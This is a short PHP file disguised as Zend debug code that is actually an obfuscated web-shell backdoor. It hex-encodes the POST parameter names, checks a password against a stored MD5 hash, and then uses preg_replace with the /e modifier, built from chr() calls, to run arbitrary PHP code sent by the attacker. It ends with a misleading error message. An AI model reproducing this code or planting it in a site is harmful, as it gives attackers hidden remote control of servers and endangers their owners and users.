<?php
if (isset($_POST["\x54\x75\x78\x6e"]) && isset($_POST["\x50\x6f\x65\x72"]))
{
	$__PHP_debug   = array (
		'ZendName' => '54,75,78,6e',	
		'ZendPort' => '50,6f,65,72',
		'ZendSalt' => '247b634d26b839d349746e9bd93afdbb'
	);
	$__PHP_replace = array (
		pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),
		pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),
		$__PHP_debug['ZendSalt']
	);
	$__PHP_request = &$_POST;
	$__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);
	
	if ($__PHP_token == $__PHP_replace[2])
	{
		$__PHP_token = preg_replace (
			chr(47).$__PHP_token.chr(47).chr(101), 
			$__PHP_request[$__PHP_replace[1]], 
			$__PHP_token
		);
		
		unset (
			$__PHP_debug, 
			$__PHP_replace, 
			$__PHP_request, 
			$__PHP_token
		);
		
		if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');
	}
}
?>